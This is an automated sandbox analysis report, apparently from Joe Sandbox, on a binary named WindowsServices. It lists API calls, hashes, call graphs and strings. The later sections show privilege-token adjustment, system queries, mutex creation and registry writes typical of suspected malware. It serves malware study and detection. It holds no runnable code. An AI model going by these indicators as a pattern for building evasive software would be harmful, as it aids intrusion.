                                                                        • String ID:
                                                                        • API String ID: 291364621-0
                                                                        • Opcode ID: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction ID: 6d70c99ac97023b5f14d40c01a2117d862bf0d83ff31a6fcaea798b65c65e005
                                                                        • Opcode Fuzzy Hash: cc57a5fc9d29755f929ad528291421c18db79410564ff0f4d1ad48c5de029751
                                                                        • Instruction Fuzzy Hash: 5FA1F971108341DFC314DF69C985E6BB7E9EBC8704F008A2EF596A3290D774E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A56
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A7E
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B21
                                                                          • Part of subcall function 004039C0: _ftol.MSVCRT ref: 00403B4C
                                                                          • Part of subcall function 004039C0: Polygon.GDI32(?,?,?), ref: 00403B9A
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404A9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ABE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ADE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404AFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404B9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404BFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404C9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404CFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404D9E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DBE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DDE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404DFE
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E1E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E3E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E5E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E7E
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404E9E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol$Polygon
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 2518728319-821843137
                                                                        • Opcode ID: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction ID: 1b864ce688a3351c981eaee8f36bd257d0a296356b300086fb8b46b6cfa255b8
                                                                        • Opcode Fuzzy Hash: 87e4436c3c6629d57b8aebde8347d3bf4d65c1ba0eaf32c96809e53bf2946d36
                                                                        • Instruction Fuzzy Hash: FAB1B1FA9A03007ED200F6619C82D6BBB6CDAF8B15F40DD0EB559610C3B9BCD304867A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00405316
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040533E
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403F95
                                                                          • Part of subcall function 00403E10: _ftol.MSVCRT ref: 00403FBF
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                          • Part of subcall function 00403E10: CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040535E
                                                                          • Part of subcall function 00403E10: CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040537E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040539E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004053FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040541E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040543E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040545E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040547E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040549E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004054FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040551E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040553E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040555E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040557E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040559E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004055FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040561E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040563E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040565E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040567E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040569E
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056BE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056DE
                                                                        • CopyRect.USER32(?,004384C8), ref: 004056FE
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040571E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040573E
                                                                        • CopyRect.USER32(?,004384C8), ref: 0040575E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$CreatePolygon$Combine_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon0$Polygon1$Polygon10$Polygon11$Polygon14$Polygon15$Polygon16$Polygon17$Polygon18$Polygon19$Polygon2$Polygon23$Polygon24$Polygon28$Polygon29$Polygon3$Polygon30$Polygon31$Polygon32$Polygon33$Polygon34$Polygon5$Polygon6$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 3890769595-821843137
                                                                        • Opcode ID: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction ID: 87a306119b05220822c14238118f6d845cb676b63f2a489d8e55d3df45724c17
                                                                        • Opcode Fuzzy Hash: 85cede26e4b860c6ad17a1a95b28b9ea8d05a42ed7a07d3d258b3a2797b32652
                                                                        • Instruction Fuzzy Hash: 09B1B2FA9803003ED200F661DC82D6BBB6CD9F8B11F40DE0EB559610C6B97CDB1486BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        [Control-flow graph not reproduced: chain of basic blocks from 404ec0 through 4052b7, each calling CopyRect and sub_403c20 with a short fall-through branch between them; legend: Executed / Not Executed]
                                                                        APIs
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404ED6
                                                                          • Part of subcall function 00403C20: _ftol.MSVCRT ref: 00403D58
                                                                        • CopyRect.USER32(?,004384C8), ref: 00404F10
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmp
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CopyRect$_ftol
                                                                        • String ID: BottoFlowerPetal2$BottomFlowerPetal1$BottomFlowerPetal3$LeftFlowerPetal1$LeftFlowerPetal2$LeftFlowerPetal3$Polygon14$Polygon15$Polygon16$Polygon17$Polygon2$Polygon3$Polygon31$Polygon32$RightFlowerPetal1$RightFlowerPetal2$RightFlowerPetal3$TopFlowerPetal$TopFlowerPetal1$TopFlowerPetal2
                                                                        • API String ID: 1144628616-677921438
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                        • String ID:
                                                                        • API String ID: 801014965-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 0040450A
                                                                        • _ftol.MSVCRT ref: 00404538
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00404560
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404585
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040458F
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 004045C3
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 004045CB
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • _ftol.MSVCRT ref: 00403F95
                                                                        • _ftol.MSVCRT ref: 00403FBF
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 00403FDF
                                                                        • CombineRgn.GDI32(?,?,00000000,00000005), ref: 00404004
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040400E
                                                                        • CombineRgn.GDI32(?,?,?,00000002), ref: 00404042
                                                                        • CreatePolygonRgn.GDI32(00000000,?,00000001), ref: 0040404A
                                                                        Similarity
                                                                        • API ID: CreatePolygon$Combine_ftol
                                                                        • String ID:
                                                                        • API String ID: 2242366081-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • CreateCompatibleDC.GDI32(?), ref: 00409EBE
                                                                        • LPtoDP.GDI32(?,?,00000002), ref: 00409EDA
                                                                        • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409EFB
                                                                        • GetMapMode.GDI32(?,0040C6D4,00000000), ref: 00409F22
                                                                        • DPtoLP.GDI32(?,?,00000002), ref: 00409F3E
                                                                        • GetWindowRect.USER32(?,?), ref: 00409F87
                                                                        • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 00409FFA
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapModeRectWindow
                                                                        • String ID:
                                                                        • API String ID: 1654611898-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:17.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:35
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 743 d7aa15 744 d7aa46 NtQuerySystemInformation 743->744 746 d7aa90 744->746 747 d7a893 748 d7a89d AdjustTokenPrivileges 747->748 750 d7a91b 748->750 751 d7ab92 754 d7abc6 CreateMutexW 751->754 753 d7ac41 754->753 723 d7a67b 724 d7a6ae LookupPrivilegeValueW 723->724 726 d7a6fe 724->726 691 d7aa46 692 d7aaa6 691->692 693 d7aa7b NtQuerySystemInformation 691->693 692->693 694 d7aa90 693->694 695 d7abc6 696 d7abfe CreateMutexW 695->696 698 d7ac41 696->698 727 d7a5e4 728 d7a602 FindCloseChangeNotification 727->728 730 d7a63c 728->730 707 d7a602 708 d7a62e FindCloseChangeNotification 707->708 709 d7a66d 707->709 710 d7a63c 708->710 709->708 731 d7a462 732 d7a486 RegSetValueExW 731->732 734 d7a507 732->734 735 d7a361 737 d7a392 RegQueryValueExW 735->737 738 d7a41b 737->738 715 d7a8ca 716 d7a8f9 AdjustTokenPrivileges 715->716 718 d7a91b 716->718

                                                                        Callgraph

                                                                        callgraph 0 Function_00FA0AF8 1 Function_00FA0278 74 Function_00FA0C10 1->74 2 Function_00EF026D 3 Function_00D7A2D2 4 Function_00EF066A 5 Function_00D7A5D1 6 Function_00D7A751 7 Function_00D720D0 8 Function_00D7A25E 9 Function_00D7A45C 10 Function_00FA0971 11 Function_00D72458 12 Function_00FA0FF5 13 Function_00EF05E0 14 Function_00EF067F 15 Function_00D7AA46 16 Function_00D7ABC6 17 Function_00D724C5 18 Function_00FA0268 18->74 19 Function_00FA13E8 20 Function_00D72044 21 Function_00D7A140 22 Function_00D7A540 23 Function_00D7AAC0 24 Function_00EF0074 25 Function_00D7A8CA 26 Function_00D7A776 27 Function_00FA06DB 28 Function_00D723F4 29 Function_00FA0A5C 30 Function_00D721F0 31 Function_00EF0648 31->4 32 Function_00D7A2FE 33 Function_00D7247D 34 Function_00FA0BD0 35 Function_00D7A67B 36 Function_00EF05C1 37 Function_00D7A078 38 Function_00FA08D5 39 Function_00FA11D5 40 Function_00EF0740 41 Function_00D72264 42 Function_00D72364 43 Function_00D7A5E4 44 Function_00D7A462 45 Function_00D7A361 46 Function_00D7A960 47 Function_00D7A56E 48 Function_00D7AAEE 49 Function_00D7A7EC 50 Function_00EF05D1 51 Function_00D7AA15 52 Function_00D72194 53 Function_00D7A893 54 Function_00FA0B3E 55 Function_00D7A392 56 Function_00D7A812 57 Function_00D7AB92 58 Function_00D72310 59 Function_00D7A99A 60 Function_00D72098 61 Function_00D7A186 62 Function_00D7A486 63 Function_00D72005 64 Function_00D7A005 65 Function_00FA0729 66 Function_00D7A602 67 Function_00D7A20C 68 Function_00D722B4 69 Function_00EF000C 70 Function_00D72430 71 Function_00D7A73F 72 Function_00EF0606 73 Function_00D7A0BE 75 Function_00D723BC 76 Function_00D7213C 77 Function_00D7A23C 78 Function_00EF0001 79 Function_00D7A6AE 80 Function_00D7A02E 81 Function_00FA0080 82 Function_00FA0006 82->1 82->13 82->18 82->72 82->75 83 Function_00EF0710

                                                                        Control-flow Graph

                                                                        control_flow_graph 184 d7a893-d7a8f7 188 d7a8fc-d7a90b 184->188 189 d7a8f9 184->189 190 d7a94e-d7a953 188->190 191 d7a90d-d7a92d AdjustTokenPrivileges 188->191 189->188 190->191 194 d7a955-d7a95a 191->194 195 d7a92f-d7a94b 191->195 194->195
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00D7A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 167a5f56a4cb0af205b0e73fe35812841d46158cdac51be12d7c86b06deba73c
                                                                        • Instruction ID: 3a9dbb8006a4c09dd6ff018c83b609867e5cbc7bba20e44ea5abc3dcf7270e05
                                                                        • Opcode Fuzzy Hash: 167a5f56a4cb0af205b0e73fe35812841d46158cdac51be12d7c86b06deba73c
                                                                        • Instruction Fuzzy Hash: 9921A3765097809FDB228F25DC44B52BFF4EF16310F0984DAE9858B563E2719918CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 264 d7aa15-d7aa79 266 d7aaa6-d7aaab 264->266 267 d7aa7b-d7aa8e NtQuerySystemInformation 264->267 266->267 268 d7aa90-d7aaa3 267->268 269 d7aaad-d7aab2 267->269 269->268
                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00D7AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 301ce26d4f11f1a17abbd2e1c2e1dbf49fe210afe5ee8cb4f839e5062ba2bfb2
                                                                        • Instruction ID: 9214acdb0138b9b7e3c2b38ed475113dee621a730882bb370139170ee09db3b2
                                                                        • Opcode Fuzzy Hash: 301ce26d4f11f1a17abbd2e1c2e1dbf49fe210afe5ee8cb4f839e5062ba2bfb2
                                                                        • Instruction Fuzzy Hash: A511AC724093809FDB228B14DC44A92BFF4EF46324F09C4CAE9844B163D265A908CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 293 d7a8ca-d7a8f7 294 d7a8fc-d7a90b 293->294 295 d7a8f9 293->295 296 d7a94e-d7a953 294->296 297 d7a90d-d7a915 AdjustTokenPrivileges 294->297 295->294 296->297 299 d7a91b-d7a92d 297->299 300 d7a955-d7a95a 299->300 301 d7a92f-d7a94b 299->301 300->301
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00D7A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: da82a16a042af5d9a48358102a6ed31c8ee3ca1d8ee15f12f5ed8d1a2a0f1e90
                                                                        • Instruction ID: 0110f3bd04ed7ceba9caf5b3d334209a8032cf19699e148d68face34e8830ca5
                                                                        • Opcode Fuzzy Hash: da82a16a042af5d9a48358102a6ed31c8ee3ca1d8ee15f12f5ed8d1a2a0f1e90
                                                                        • Instruction Fuzzy Hash: E31151765002049FDB208F55D944B56FBE4EF44320F08C86ADE498B651E375E858DF72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00D7AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: db319c710fd23e55118f9d0a8d47cfa3af10ebe0a938c6adf149da8a2b8fbf00
                                                                        • Instruction ID: 90c6b5be29271b09f194558b707ea412f9d9d6d0e470a1df22aa930ef09d7a89
                                                                        • Opcode Fuzzy Hash: db319c710fd23e55118f9d0a8d47cfa3af10ebe0a938c6adf149da8a2b8fbf00
                                                                        • Instruction Fuzzy Hash: C0018F315002009FDB208F09DA88B65FBE0FF58320F08C49ADE8A0A651E375E418DFB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 0 fa0278-fa02a6 1 fa02a8 call fa0c10 0->1 2 fa02ae-fa02bc 0->2 1->2 3 fa03d8-fa03ec 2->3 4 fa02c2-fa0305 2->4 7 fa03f2-fa046b 3->7 8 fa0475-fa04c8 3->8 22 fa03b9-fa03d2 4->22 7->8 18 fa04ca 8->18 19 fa04cf-fa04e9 8->19 18->19 27 fa04eb-fa0515 19->27 28 fa0520-fa0677 19->28 22->3 23 fa030a-fa0316 22->23 25 fa031c-fa034d 23->25 26 fa0bbd 23->26 37 fa034f-fa0385 25->37 38 fa0390-fa03b3 25->38 32 fa0bc2-fa0c05 26->32 27->28 60 fa06ff-fa0bb8 28->60 61 fa067d-fa06bb 28->61 37->38 38->22 38->32 61->60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 935a10b3ea3e5a7da1439b7be985e46773b9b6daa4f5163d5c859bc4011b0a97
                                                                        • Instruction ID: d23e79553e9dfadb4737ed84cfecdcb50adf5422970d0ffecc6e6180bbf59fd0
                                                                        • Opcode Fuzzy Hash: 935a10b3ea3e5a7da1439b7be985e46773b9b6daa4f5163d5c859bc4011b0a97
                                                                        • Instruction Fuzzy Hash: 46B14970A01318CFDB14EF74D954BADB7B2AF49308F1084A9D449AB391DB799E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 68 fa0268-fa02a6 69 fa02a8 call fa0c10 68->69 70 fa02ae-fa02bc 68->70 69->70 71 fa03d8-fa03ec 70->71 72 fa02c2-fa0305 70->72 75 fa03f2-fa046b 71->75 76 fa0475-fa04c8 71->76 90 fa03b9-fa03d2 72->90 75->76 86 fa04ca 76->86 87 fa04cf-fa04e9 76->87 86->87 95 fa04eb-fa0515 87->95 96 fa0520-fa0677 87->96 90->71 91 fa030a-fa0316 90->91 93 fa031c-fa034d 91->93 94 fa0bbd 91->94 105 fa034f-fa0385 93->105 106 fa0390-fa03b3 93->106 100 fa0bc2-fa0c05 94->100 95->96 128 fa06ff-fa0bb8 96->128 129 fa067d-fa06bb 96->129 105->106 106->90 106->100 129->128
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 7d4ef0b22bee6ef790028182536d07fe25326ab0bab69160871af02641dc83b2
                                                                        • Instruction ID: ea4d896b86a2f35a668c81712989c92e39bb396815d1b31a5cff7c77700f2c64
                                                                        • Opcode Fuzzy Hash: 7d4ef0b22bee6ef790028182536d07fe25326ab0bab69160871af02641dc83b2
                                                                        • Instruction Fuzzy Hash: 38816B70A01218CFDB14EF74D955BADB7B2AF49308F1084A9D409AB391DF799E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 136 d7ab92-d7ac15 140 d7ac17 136->140 141 d7ac1a-d7ac23 136->141 140->141 142 d7ac25 141->142 143 d7ac28-d7ac31 141->143 142->143 144 d7ac33-d7ac57 CreateMutexW 143->144 145 d7ac82-d7ac87 143->145 148 d7ac89-d7ac8e 144->148 149 d7ac59-d7ac7f 144->149 145->144 148->149
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00D7AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: e82165eb6c0ad51d24d0eb0a35662d3232888ae1edbdff6aa0d5cfa0474ea267
